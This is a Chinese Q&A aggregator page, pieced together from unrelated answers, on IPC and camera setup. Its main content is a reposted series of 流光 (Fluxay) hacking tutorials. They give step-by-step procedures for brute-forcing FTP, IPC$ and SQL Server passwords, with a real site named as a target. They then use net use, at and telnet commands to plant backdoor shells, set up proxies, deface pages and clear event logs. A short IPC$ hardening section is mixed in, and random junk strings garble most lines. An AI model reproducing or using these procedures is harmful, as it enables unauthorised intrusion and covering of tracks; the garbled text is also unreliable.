ipc教學

『壹』 康佳智能蛋kipc1000連接教程

摘要 稍等一下哦正在為你查詢

『貳』 康佳智能蛋kipc1000連接教程

摘要 您好！很高興為您解答，請稍等我先看看問題，整理問題答案！

『叄』 請問流光怎麼用

流光教程
流光教程一 ON,Z$G*^ m*U
許多新人在用流光的時候不知道如何下手，小榕論壇來討論的也多是「如何添加用戶」這樣的初級問題 ：），就抽了點時間寫這個簡單的教程,希望讓新手快速入門。 $Xn3l E&e M'fl7I
h4r3|)V"S&y
我個人認為流光的破解可分為5大部分： #?c"J4l'uL;Mum

nZX'vd;E3D4{+A6g 一、POP3/FTP/…探測
Y D Z"Aw9e
N z*l6A8nuxjAZ 二、IPC探測
+v8} ]2i X r3{V ~7cNNZi:W2u
三、SQL探測
0b*[1x8g'U #}??}8Hx8O
四、高級掃描 4v`I'\ D\Z
?\)r+x!e-q)j bf
五、其它 … 9FZ%J-tE6c(}+N8v

Q H^@4VX'p 因為開發時間的原因，上面的探測模式略有不同，所以分成了四個部分，本教程說的是第一個部分的探測。後面的探測模式應該屬於流光的高級應用了：） Z:X%?#a+y A&V

6JO v+] f9jS,m x 下面我就簡單說一下基本的破解流程： $~S @O%r2D

z|+|)qsq BC 1、你得有流光，我這里試驗用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G

Q a:x7c.Kf4u 首次啟動流光，看到如下圖的界面： :x2jWr0n
J+x

"d)zkP!\ h$a ]|&Q0ur
o

X-U9[zO"k;M
首次使用是要注冊的，不過不要想到花錢：），小榕只是想看看有多少人用他的流光而已。你可以填好相應的選項，然後點發送即可，如果發送失敗，你把發送伺服器換個就好了。
1Dy*^7CM4y4jj7BA )[sRpa7_/w
S;X j@_H
E+U4xtR:@5EYt/CJ)}
因為重裝系統，我也不知道我發了多少次了 ：（ 。如果不想注冊，就稍等下面的進度條走完，點稍後即可。如上圖：
y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L

tN;FQDgH-x -s(Z5w5FEr@p[

H9ed$^"N[*P"X .A$}Vtx6q2sJ
2、找個站點，我選的是中華網[url]www.china.com[/url]的主頁空間（home4u.china.com），探測方式：FTP。
N |B^Fk4Y +I V+X lf
有人常問掃描埠有什麼用，其實作用就是你知道他提供了什麼服務，然後可以採取相應的探測方式來獲得PASS了：）我們知道主頁幾乎都用的FTP上傳，我們這次就用來測試一堆用戶名，看看有沒有弱智的密碼，呵呵，如果有 hacker.at.china.com 這樣的，也不妨霸佔為己有：）
4n9N OnqZkd
7W N
mEQ5ZHw 3、加入要破解的站點名稱：右鍵單擊FTP主機→編輯→添加→輸入 home4u.china.com →確定！ \:] B E'MGw

mZy9yF:qpE8K eJ5L!I a#C4I1O*w
yU&CX#X$x,r
CrN Ap

!zS,@}0m/P,V7} 4、加入用戶名：我們要破解的是一堆用戶名，所以要加入用戶名的列表文件！我們就加入流光目錄下的 Name.dic ：）右鍵單擊剛才添加的主機：home4u.china.com → 編輯 → 從列表中添加 → Name.dic → 打開
;g$d.k H-W 5itXRHu%?8G

7_bvg'fU
C&@2H W,]S NO%yOw-Y.\*E x hJkB6l
1l;v0{`!~d+e%hU u
然後會有「用戶已存在列表中」的提示，我們選中「不再提示」 → 確定 。如下圖： 6A ~:uu X3eh
$G7Z%~ n
w

wVF5^tB#yT#k%Nf7c
CkjR-X[_@-b 用戶名太多，我們可以用點主機前面的「—」號把用戶列表縮起來，如下圖：
+l3^8TC0R3Ml
7Q,FP oe`"[mk Z-m1x^kB8j$Ej]
!V8WoCEr
大家注意名字前面的小框中必須有√要是沒有就無法探測了。 Xcj)[ PR
\J
L,X5W Cv Lv o3G
5、有了用戶名，我們就可以進行探測了，大家會想到怎麼不用密碼？其實流光有個簡單模式的探測，也就是用內置的密碼」：「123456」和「用戶名」來進行探測，因為這樣的密碼是使用頻率最高的：） 9r)?e b;M4Y5y#pixy

{M JrO#j
@Hmg
_ 當然你可以修改這個簡單模式的文件，加入你認為弱智的密碼。方法是：單擊 工具菜單 → 模式文件設定 → 簡單模式探測設置文件 → 加入你要加入的密碼 → 把設置文件存檔！ OQ
hI^,O

F Q_~.k ODI 下面我們就來看看這一堆名字裡面有多少是用「123456」和「自己名字」來作為密碼的。
}S~5M{)E
EbUz RqHZ 探測 → 簡單模式探測！
u$b'n(jR,Ik0h@
b(P*|@-s,U!P;uO.{ hm.T2l*t},|
T ]q&I2q~

3F_(W(C j?\
M s+q O3L$s 探測中…
:fJ+A;T@S}&u
y+g.Bl C-_6x"U@X+M1]B
$k.S*q!g.] X
K]e/y^Ii
:]^YE/A$fB#W
1M+]t+eW QAM 6、探測完畢，也看到結果了，流光會問我們是否查看入侵檢測報告，不想看可以選否。
*sQ!cR:C'oms
;w I`&x+y
|I)vh7?
xc|
;Hg
a+B5r:vt#Je 報告的畫面
2z)S"nS @l4~#VM
yd
x!w*O b| {?Cb1ZDZ

\.i c`h xc 7、如果要探測的是一個用戶名，就需要添加字典、或者密碼方案。方法是：右鍵單擊解碼字典或方案 → 編輯 → 添加 → 選擇一個密碼檔即可。 ]}E5? J l/@

J$``IO#R3i 以上就是流光的一次簡單的探測了，事實上這些功能只能算是流光的2.5版的功能，流光2001增加的IPC/SQL/高級掃描等功能，使流光更加強大。如果你對這個已經很熟悉了，相信你看流光的HELP就會很快的學會其它的使用方法的。
9\W i R-JUV j {L k/X |
關於用戶名的問題：有人覺得自己加入的用戶名不一定存在，如果不存在豈不是白費了力氣？這點你大可以放心，流光會進行驗證的。而且現在注冊的用戶入數之多，想個沒有的名字都難，不信你隨便敲個試試。
Vi~PLWdY UYk5@Ou
關於字典的問題：流光可以使用字典方案來探測，當然你也可以生成字典，有的新手在作練習的時候不知道怎麼做，你也可以用記事本生成，每行輸入一個密碼，存檔後將擴展名改稱.DIC，流光就認出來了：）如果你連擴展名都不會改 ：（ 那……
wp-w7J"Ga)\af+p
L/\Di/`@y X#c
2a2H~/f9W[,L o r @m F ~
只要是學習、誰都會遇到困難，我也是問題多多，還得向小榕、EKIN討教，歡迎大家多交流 ：）
]J+|3{,mJ-k#j!M
0W H%X$sp/@ a
u3I4L%S9n bt
d
P#m)Zqs
`1_s"W)BD :c"{n_&r
]
待續……
香煙 2007-5-28 11:07
流光教程二
很長時間也沒有寫什麼東西了，這源於我的懶惰和生活缺乏激情。我的記事本上一大篇都是欠朋友的承諾 ：（
l P8M"F5M:b2|0k !J:Ix~R h
你既然看到這兒了，就在聽我牢騷幾句吧：）搞安全應該有正確的心態，別以為你會了個工具使用就可以一步登天。
{B \[y0x\/u 'a+g a S)tUc
交流、學習才是最重要的，把自己心態放正，無論我們是高還是低。
R p4O)Z'qT#L n.Wxu3Zk0x
5F i GX!xJL+Z#`dN
今天要寫的是流光的IPC探測： \,`;P_`?

Ev b n+jq 一、目的和任務： +@&g2Bs/dp+i
M UA0P@ O;t pu!?DP
1、用流光的IPC探測獲得一台NT主機的管理許可權，並將這台主機做成一個跳板/代理。
V |
nnP;_gTX] 2、學習IPC探測的相關知識。
!gnaW4v,Ft9~ 4X-R0J'U:\ |td
二、探測流程：
E],@9y/b Bm#a~ S8HD#?%X
1、你得有流光，我這里試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/
X.Q#mG"Vj^
S }+T!J (U:s,o|P1F\I2p
2000提供的功能。而且流光FOR 2K 要求你的操作系統得是NT/2000，否則流光啟動會失敗！
+DfdoX;})J (~\Q.` v \&|7\3o
什麼是IPC：
l2E6WK0@4b^
d,d-Tx
krx!miLM IPC是指"InterProcess Communications",准確的說是ipc$，是默認的在系統啟動時的admin共享。 .p gsh Y_E
S#M+Y+c^+\_|
IPC$是Windows NT/2K中特有的遠程網路登陸功能，它的特點是在同一時間內，兩個IP之間只允許建立一個連接。 (nV6s7f4k

RE u*@!T 注意，你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。 g/?"o[;We AvE w

2\"D,R+t6u;z $s e5m
P6@^5v7t
:s#n8[q4rA g
可不可以通過IPC$暴力破解密碼？當然可以 ！ 不過，是不是太笨了點 …
#p"U`9F9v8l
v,P
xK8X$r
Am k{8K*G7q5R
2、首次啟動流光，會看到注冊的畫面，具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC
sI)[at
M9l
y3t p 探測獲得管理的許可權。這里我們要作的是得到一台跳板，那麼就可以用命中率高的辦法來探測了（測試一堆IP來得 A:q6EkB5_v
nLa5Q*pxL
到弱口令）。
"S[;hr4]W)@
9Q$?5X4w(a 在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項，或者直接按Ctrl+R。
u ~ ]
` W6C 圖main1 4H%SmP u3`-g

7\0v7S7S^ue
+k.h]7}vr4A*| "B^;XKZ0L;R"_-H
圖main2 Qmm _ Lh7GV

-XCq2S~ cQ
EG"miTgi+u
6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口，輸入我們要破解的IP段，我們輸入了來看看。圖main2我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令，這樣可以加快掃描的速度 ：）填入IP，選擇掃描NT/98主機 k3P.gQ$p

.ZA F#w X 4、探測中…… （start1） %_,sn#G;q3Y`
!Gv?@G;t0|1t_D
（注意如果你要探測的是流光保留的國內的IP段，會被禁止的，也就是探測的時候信息欄出現"IP保留"的字樣） 6rb2ZLn9n'?3F
M.KoJ2c

!dnP6me;D%C iCBt)hvs!bm)v

6e(JmneR 5、這是掃描到的NT/98主機列表：（jg1） 9yd R9V @
c E G
4z zC1Kn9GOP ?
1sa _W Om9l
'U0x?U mk ^2G5j
6、沒有掃描到常用密碼：（
2\"r'i'kA&n;o 6KgORI"y t}-T$J

HfegS j c,o9v*LQ)K:F
7、就不要查看報告了 ：… &e2N(Ki,t \&WM@FO
} z'p-S%yYu4W

WU9g._w/S5A
\:kr_8_7gA)A 8、有了不少NT/98的機器了，正式開始IPC$探測：IPC$主機－探測－探測所有IPC$用戶列表。 $P8E]3\9B K2pg

AP#[(N W5P4Y
%n)T h9qO&[k"U3y P Xe
)g2tM"l-^)A.s8N} 9、注意下面兩個對話框的設置：全選上，我們只要IPC$管理員的弱口令。然後點選項
Y i:~C{DP Nzy _x3wxL
(C0M4X W@vO

"mx-?qz]%n4z 10、點「選項」 ：為了加快弱口令掃描速度，這里的兩個我們可以全部取消，比如下面的那個，如果對方禁止列出用戶了，我想對於一個網管來說，弱口令可能性也是微乎其微。 T1@+Z\q _'xbU

3U+n)L1?1ZHE0E
?]*\9K5\6{4o2{3a l8_W
-~K+d6^]%w mg x1_fw[
11、探測中……
L|9Wl/`9i!w
iX5~o5y"E C+@ /l8f#OxW:@Q
FL?HKg/vQ
12、有密碼了：） vh3tv/zll,p
xm;{Z r+L3{~"k

y1pg2x l z:P l(f6y2[2vSY;K,]
13、又出現了查看報告的窗口，看看 ：）
#Y0U fH M@,@Tf x
@^%Z0v(t [| 9m-`)X-P(Q#o,I
C8E [,F W
14、有遠程主機的管理密碼了，我們剩下的就是想辦法控制它了，有什麼好辦法么？ ：）有的是 ！自己看看工具－ i:h0{(AGCO5O

H.j+f!X;Fp8o 菜單下的IIS遠程命令:)是不是很簡單呢，我以後在說，今天還是先練習net 命令吧。
}6Pb \+u W#C %V%`*@$m*u"pH&P
15、黑了他 ！
w2K#c
u"e}
@2]*w5d.Y+V'D8bB 開個dos prompt 執行如下命令，本次用的例子如下圖。
1v'kePX4a-r
)z9N,s5hb-AaH_ 1、 net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
6sBdD1z3l p#T(o_p5ve+PSqC
2、 icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄 ：） 這里文件多。
*Q1T*l,e"K%_/E
-Pr:z%mOn/L 3、 net time file://對方IP/ || 看看對方的本地時間
{7J{ H.|:f!oy Q\M
R g;Yi}x+tO1j&_ 4、at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序，在這里我們用soon這個程序來做也可以，它可以取代 3/4兩步。
Luw UB @)L2~fy S0@lz
5、 telnet 對方ip 埠 || 1Q&LR1Z3W/h }
{K9x J4s-U(K%C-_*c
6、輸入pass （如果不是用icmd.exe，或者沒有設置口令就不用了） ||
8Hv3k?)um1o@~`[ QF@G~%gZ8jF
7、在開個窗口，繼續 我們用的東西。 sock.exe ntlm.exe cl.exe clear.exe 1p"?+X1LN$K~4k
z
a1\5E[:?:j5f
圖cmd1
-MRgW,~F/cx
q\&Vh |,P #o&n8N/R` l%RB

9O2i,ZZ ~/~,b kA%c4f-h!v Q 圖cmd2
Nl#I\*s E V
Ui H
R"C%X
;L;\#~A-g])_$o
Z(G;ii
C 如果我們真的想黑了他，只需要把我們的首頁文件覆蓋目標的首頁就ok了，我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止，一般是在X:\interpub\wwwroot\ .
%\YUsC5z2th2w j2WwPs*C:@
假如首頁文件是default.htm並且在c:\interpub\wwwroot，這樣: default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M
_s8c8P\B K
下面的圖有演示 t2~5l:i'v,j

.T'l!h)XGK_-FN^ 7、其實黑人家是很低級並且沒意思的：（，我們最好是物有所有，作成跳板吧，今後幹活方便點：） /S.S,_? ^"L-y

F&D(HL ^ 執行我們 過去的ntlm.exe ，取消驗正。在給自己留個後門，比如提升guest的許可權，或者其它的後門工具，這類東西多了自己選吧，看看殺手的那堆東西 ：）
Gk,Q@ X"n\m us E
} ^\W(a G V,S
Y1aU j9t ^/n[7K
6Z`!q!Dx-W\ 8、做個SOCK5代理玩玩，用在QQ上不錯喔： cq&Q `k+h8m
1G1}lX'S(F
執行我們 過去的sock -install，net start skserver 看看用在QQ上的效果：）
1C.P7F6?"mY
[7D&n&l|@
*b wh ?}1O/SW
0s(r2G:K9_
A\kB/iw 是不是沒有看清上面的步驟呢？ \$u1Ll]qJ,\Q(e

1QG2S/zq4_0DK wN 下面是我telnet 上去後所有的命令：）
M)M k|.Z $me*bZRZr

0c0Zw8X7}I
$pF g1^.A 9、還能做成其他的么 ？ yLP4s#w"\5i4|
/}2}H6h!j
c/|o;A
當然了，只要你有時間，並且願意做，我曾經偷偷的把自己的主頁放到人家的server上，速度快、空間無限，嘿嘿 ：）
A&b!W2`My^#v
5Lj} O`qG 10、日誌清除，斷開連接 ： dB#V
a F~w f
"x)Op(r[`9D
執行我們 過去的cl.exe clear.exe 都可以清除日誌，比如clear all ：清除所有的日誌。然後在斷開連接：net use file://ip/ipc$ /delete

FNwL3v
4J$lx'Xztp 這步我認為是必需的，尤其是在一些有爭議的站點上，或者是國內的站點，除非你想讓電視上報導XXX地區我神勇刑警捕獲弱智黑客一名XXX。 'rKI
h8G V(V
$F&tj+\W6f
在網吧寫完 ：（ 錯誤之處請賜教。 ,f^#B#yg3u J#q

&u;Y/q~3hN A~ 只要是學習、誰都會遇到困難，我也是問題多多，還得向小榕、EKIN討教，歡迎大家多交流 ：）
香煙 2007-5-28 11:08
流光教程三
關於IPC$的終於寫完了，那個該死的網吧，鬧哄哄的聲音聲聲入耳 ：（，你可能想不出，IPC$探測是我在網吧完成的，而且那個網吧還有公安部門的網路監視器，這東西很有意思，好像是VXD調用，和IE運行庫集成到一起的。哪天非弄來研究一下，說不定一款別具特色的木馬就問世了 ：） PY{ S+Fy!Yo
%J@2J!QlVW7u;A
不知道你看完前一個教程有沒有要扁我的想法。。。。
zv'y;w,\!msU
R7dr8g
LWpd 交流、學習才是最重要的，把自己心態放正，無論我們是高還是低。 jN;d|C c%|]

\#O"o7Nd
+ER[ x`v'r 今天要寫的是流光的SQL探測，順便說說ipc$補遺和其它的探測手段。
sI!\
~*F3~
hmw.N Eer-Ca+t 一、目的和任務： 1Z%CUh!v:@i DZ
/]a E)Z4G#].e
1、用流光的SQL探測獲得一台NT主機的管理許可權。 dU/[-d9JI'k
2、學習SQL探測的相關知識。
^q$f5F k o;d qJ 3、IPC$補遺和其它…
$n j6n$V yl 二、探測流程： ,y?8gzw)l

,F7aj
G@:[ 1、你得有流光，這話不用在說了吧：） rcHF&O4w|C
Ny|f\X
什麼是SQL：
2?Ek\+Z0G"E \;f"n0Y0? x+F^]6~ H9r
SQL：微軟開發的資料庫，專門用在微軟的OS上，功能類似Linux 下的Mysql，暈……，到底誰類似誰啊？有時間
7K$e.k Jbp (wi4PW6s9pU8e/C*H
去看看SQL的聯機手冊，說的很明白。
&W8A4of)?)t)U
'?c3QW@.k#Dh@*Ll SQL服務程序支持的網路協議: Nl*`yf ?

.G0y)?F,R$`rH Named pipes :使用NT SMB埠來進行通信，存在被SNIFFER截獲數據的危險。
YB5I7`
ME E9v4D
-I
f}ru \ IP Sockets :默認狀態下開1433埠，可以被掃描器探測，存在被SNIFFER截獲數據的危險。
:b3L{
~-S Xl6}E!]2c o3C]
Multi-Protocol ：客戶端需要支持NT RPCs，數據加密。 4T7f3e?{1`
[a
JJq(S:o9`\,nk
NWLink ：存在被SNIFFER截獲數據的危險。 5{/A
hH3_F jv*LM
%^3qxM8h:\q
Z `W!y!m
AppleTalk (ADSP)：存在被SNIFFER截獲數據的危險 v"t3N"e DZx

7y3r KD UkGZW@ Banyan Vines ：存在被SNIFFER截獲數據的危險 :t k6Z7RZ;W~
Bkh{3_/y9k7D p
在Internet上，95％以上的SQL Server 採用的都是IP Sockets協議，流光探測的就是這個協議默認的1433埠
;MA'vxIjn.L"V7E
([Z8u)b[1N)l[xjf
vI'Go'}dF E q.j 2、我們要獲得SQL 主機的管理許可權，那麼還用命中率高的辦法來探測了（測試一堆IP來得到弱口令）。
Hz W2VB"Pq
.~8U6@/\?
H:{ 對一台固定主機的探測等我下期的教程：） WUTp!~-M:K
s)X
Zh4Lz
在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項，或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@
圖main g;S:]_4M$^
)[MQp j
V_0@sF~
$yX0tZ;TX'l(u(b
I0i)Q2cu2iv/ul
3、出先了下面的小窗口，輸入我們要破解的IP段，我們輸入了來看看。（注意如果你要探測的是流光保留的國內的IP段，會被禁止的，也就是探測的時候信息欄出現「地址保留的信息」）
iO~/qo|p4\ 圖inputip
@,l6S/mi6p ,S4^XK-rb

W7i}tF,?` H B j1jWF:~|;MV

%{]-Y;`(wR-[cn 4、探測中……
5hB-u.aXGA Xb
bm!hl]-Kn|1F5B 5、有密碼了：） 圖psss 1→3 &I*Xett-^ wY+d:N(Q

`,Te`#p` yc2EJ*i7x%|Qu'e
t:` V9^]
Ee+x-va;W ]F
6uR8p)Crk5\7?
aH0cgLClEGp9I

*{(S&hN:n
2H]6I3xJ4V | ip#^/H] My-I g7Z
6、下面我們進一部獲取管理員的許可權。 4b.RQK4L
用SQL 客戶端去連接主機，沒有裝SQL :( ……………… 沒關系，流光自帶了連接的工具，以前我一直都是用的天行的工具SQLexec，但現在可以不用它了。 A d-i9MC3O!oZ1g
R`s AB$u@A
打開菜單 工具 → MSSQL工具 → SQL遠程命令看看：） f8jZ]/J
圖tools
| q^%g
{$H|8p6~
D~ fE/Yj'Hyy G4k#X,br(h

+sjL t+N ]j 圖SQLcmd 7`;^3d4Kd&Wt\4ir2a
@0|#Zh*I`"U
2^M*O8rLD

zL$n*Gl 4nsB*l+?X
7、獲得管理許可權、增加後門
s+Ex MD&zj*y(N 圖cmdline 6R^ {.HtkOe g
5x%G7L_ z;LM A
L0Y?2b:sy
8HN
h#wk.f

0f-}8s(Z%Q gO
{9Rhd aD 8、現在我們已經是管理員了：）
3l"eM1G(e.?(U { y.M tn
以前我們是用at命令來遠程運行程序，今天順便說說流光中自帶的「種植者」，看看 工具 → nt/iis工具 → 種植者，我們來用它遠程啟動icmd這個後門。 xW9{5d lp
4o@7Fi.O5Mt{
圖lookcrop 5q l.c.nM6k
&H V} g.e}_O
oS8D'l&L
l e9G1a~(wy
圖crop &V8XM;u }\0t%_Sd

{j qE
C#?Lc/W
)\$_;k,u-K
H(P1e)G;a7E 圖cropend d'VHG6@
yu

m*XX6A$b N fe3A9u%B]Sk

-VLFBb*N 一分鍾後登陸看看：
2@'zrwIB.z b9f]V4V/Ys"q#gr2H
-L-e)L,m yQG1?c
@x3A)}U$I%k1mA
.Y,EMOF
6QNC4w6rs't
7O2l(X;TT;bQp
9、再說說 工具 → 模式文件設定 → ipc簡單設置文件 。
0T:s(_)^CdaQt
3}.YUYvi)g8N 圖mode U k/d&bcw'e4m
Da \[ j;^2m
8eQI H3er!\$R
H-QJ/njtF#c
#v(H
kA%{,I9E

@i/V5V`u&o 「工具」中其他的項目和上面說的兩個類似，就不多說了。
:AL A"sF)g\ H2K
8{7e(z[(~0j']zF v
#Rn3O${]&K"h9v NR 10、日誌清除，斷開連接 ，參考IPC探測，記住可以用種植者遠程執行命令。
Q]d%H Q O
f5b ot-m mFnM8a#Cv3A
!oSO.LF|
關於IPC$補遺：上篇對與IPC$探測的文章，寫完後覺得還差點什麼沒有說：） T)Rlz*v#@gC

b8n2^,y}"Ui1` 1、我們雖然只探測管理員（admin）的弱口令，實際上在真正攻擊中是任何一個用戶口令都不會放過嘗試的，因為我們獲得了
E:mJ O#P0M,^EAJ !aF C??5k!qh9CH
普通用戶許可權後可以提升許可權，事實上，一個普通用戶的許可權在＊nix攻擊中是非常重要的。 lCkc)W@m
MN0f:GT%x
2、獲得口令後，攻擊手法多樣，不要局限於我的常式。
XJWu+Q |/U5B/Ffc
o
3、如果對方沒有XXX怎麼辦？，這類的問題去看看我以前整理的流光FAQ。 v!D+RH z K
'K;t{"S(a?rM
關於其它探測：
O)},m1]u A1J
]6H {0^7C$?U 玩玩3389 ？ Lxk8[l8F
Dc?~'^#mQ/c3L l
首先終端是WIN2K提供的功能，所以我們在掃描的時候就要選擇 「NT/98」的主機，在得到主機列表後自定義端
4]vE0~ b/o CY
6J:XH WY{AN"qu 口來掃描這些主機的3389埠，然後……
7ED.O4CM/]NZ 8l3m-J9x'?*B
玩玩cisco路由器？ Y'}
L4[x-}:qt

&|7l5x\;nm 自己想想怎麼作 ？要是想出來了，我的以後的教程就不用看了 ：）
4?
` [wxXB"o/}~ y!GGM X}\(H:|'`

1_h(r5b"V1E3ht]%j
G6RK^XE-u 明白了么？我說的意思是要靈活使用流光：）

『肆』 海康威視網路攝像頭安裝教程

經過很多機器視覺的熏陶，終於決定開始學習計算機視覺，於是入手了海康威視的一款半球形網路攝像機，那就開始整吧。

好嘛，由於是二手的網路攝像機，拿到手裡時只有網路攝像頭了，怎麼辦，好慌，沒有說明書啊！！！然後各種網路、知乎。找到了一片海康威視的網路攝像機連接、使用方法。

CSDN-專業IT技術社區-登錄
按照教程步驟，下載了SADP軟體，網路攝像機和電腦通過網線直連後，打開SADP軟體，刷新界面，好嘛，問題又來了。

設備查找不到，怎麼辦，要不要放棄？？？

網路、知乎找了一大圈，才看到是不是網路攝像機沒有供電啊？

什麼鬼，我入手的只有網路攝像機，哪有充電線！！！然後我就問賣家，你怎麼不給我發充電線呢？我要給你差評。估計店家對我這種剛入行的小白也很無語，店家說，這個設備沒有充電線，網線供電的。我心你個鬼，我試了沒反應啊。然後我將後面的條碼拍照給他。

店家說，確實少發了，不過這個網路攝像機是POE供電的，不是POD供電。？？？

什麼是POE，什麼是POD，我好方。

然後就郵寄來了一個類似路由器的小東西，不過沒有天線，好像叫POE交換機。

我就把POE交換機插上電，一個網口連了網路攝像機，一個網口連了我的電腦，順序是有要求的，要不然SADP識別不到。

終於，SADP識別到了我的設備，額，怎麼和教程不一樣，設備怎麼自動激活了？

不管它，繼續下一步驟了。

下面就到了更改我的電腦ip地址了，沒錯，坑又來了，插上電腦後，我的電腦竟然顯示有4個乙太網連接，差一點就砸電腦了。

然後我就看了每個乙太網連接的名稱，排出了兩個虛擬機乙太網，還剩下兩個，好嘛，我就把它依次禁用，我看看那個對它有影響。好了，終於找到對應的乙太網了。

按照網路攝像機的ip地址、子網掩碼和網關，把我電腦的ip地址改好了。

馬上就要成功了，開心的去買了杯咖啡。

回來後，用chrome登錄ip地址，怎麼需要登錄帳號密碼？店家害我啊，有沒給我全部信息。

店家回復到，密碼我也忘記了，我用的時候就是二手的了。。。。

我入手的竟然是三手貨。。。。

好嘛，浪費了那麼長時間，沒任何卵用。沒辦法，網路唄。

然後我就發現海康威視客戶服務公眾號里可以更改密碼。

輸入了一大堆個人信息後，又是下載軟體，又是掃碼，終於重新找到了密碼。

然後我就用chrome打開了ip，登錄到了海康威視網路攝像機的頁面。

怎麼不用安裝插件？和配置信息說的不一致啊。配置信息在頁面可以看到。

然後查看了他的說明，好嘛，chrome不支持。

那就換ie唄，這次終於要安裝插件了，好嘛，終於有畫面了。

還有點小得意。

錄了一段視頻，保存文件竟然放到C盤了，這怎麼可以忍，我就一段操作把它保存目錄更改了。

返回主頁面，竟然不能採集視頻和照片了！

然後又是一頓網路、知乎。找到了原因，竟然是ie自動保護功能，還有這么高級的操作嗎？ie666.

以管理員身份運行ie後，再次更改保存目錄，終於可以正常使用了。

海康威視家用網路攝像機C1
操作方法
01
第一步：需要將監控攝像機通電，將監控攝像機與路由器LAN介面直連。所有的連接工作已經完成，下面需要打開筆記本查看無線路由設置，確保路由器DHCP與UPnP設置處於開啟狀態後，第一步准備工作圓滿完成。
02
第二步：用戶需要輸入shipin7網址，進行用戶注冊，此時，必須與手機綁定，這樣才能便於報警提示功能。根據提示下載插件後就可以添加攝像機了。在確認攝像機連接正確的情況下，可直在區域網內搜索出該設備，或選擇添加序列號均可實現。按照操作步驟填寫驗證碼等完成連接。
03
第三步：其實在這種情況下，攝像機就可以正常工作了，但出於家用監控，凌亂的網線與路由器直連存在很多局限性，因此只需要通過掃描無線信號，輸入對應的wifi密碼後，就可以實現無線連接。密碼保存成功，拔掉網線會有短暫斷網現象，但5秒後又可以恢復監控模式。
End
特別提示

簡單的操作頁面與連接方式，讓更多消費者看到了未來家庭監控的趨勢，一線連接、一鍵布防。這款監控攝像機設計目的，並不完全只考慮安全層面，更重要是溝通，如何通過監控攝像機與父母聯絡、與孩子互動、與員工溝通。

『伍』 康佳智能蛋kipc1000連接教程

摘要 下載智慧沃家 APP

『陸』 求IPC-7351 lp Wizard 10.5下載地址和使用教程！

10.5版本的軟體下載地址，（網路網盤添加以下後綴，不用教怎麼做了吧？） /s/1cJT4a6
視頻地址，目前還只有1講，同樣的網路網盤加後綴 /s/1eSjT7oA

『柒』 ipc$入侵教程終結版

如何防範ipc$入侵

1禁止空連接進行枚舉(此操作並不能阻止空連接的建立,引自《解剖win2000下的空會話》)

首先運行regedit，找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)

2禁止默認共享

1)察看本地共享資源

運行-cmd-輸入net share

2)刪除共享(每次輸入一個)

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,……可以繼續刪除)

3)停止server服務

net stop server /y (重新啟動後server服務會重新開啟)

4)修改注冊表

運行-regedit

server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。

pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。

如果上面所說的主鍵不存在，就新建(右擊-新建-雙位元組值)一個主健再改鍵值。

3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務

控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用

4安裝防火牆(選中相關設置)，或者埠過濾(濾掉139,445等),或者用新版本的優化大師

5設置復雜密碼，防止通過ipc$窮舉密碼八 相關命令

1)建立空連接:

net use \\IP\ipc$ "" /user:""(一定要注意:這一行命令中包含了3個空格)

2)建立非空連接:

net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)

3)映射默認共享:

net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤，其他盤類推)

如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$

4)刪除一個ipc$連接

net use \\IP\ipc$ /del

5)刪除共享映射

net use c: /del 刪除映射的c盤，其他盤類推

net use * /del 刪除全部,會有提示要求按y確認

九 經典入侵模式

這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，後面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。

2. C:\> srv.exe \\127.0.0.1\admin$

先復制srv.exe上去，在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復制到什麼地方去了)。

3. C:\>net time \\127.0.0.1

查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe

用at命令啟動srv.exe吧(這里設置的時間要比主機時間快，不然你怎麼啟動啊，呵呵!)

5. C:\>net time \\127.0.0.1

再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就准備開始下面的命令。

6. C:\>telnet 127.0.0.1 99

這里會用到Telnet命令吧，注意埠是99。Telnet默認的是23埠，但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。

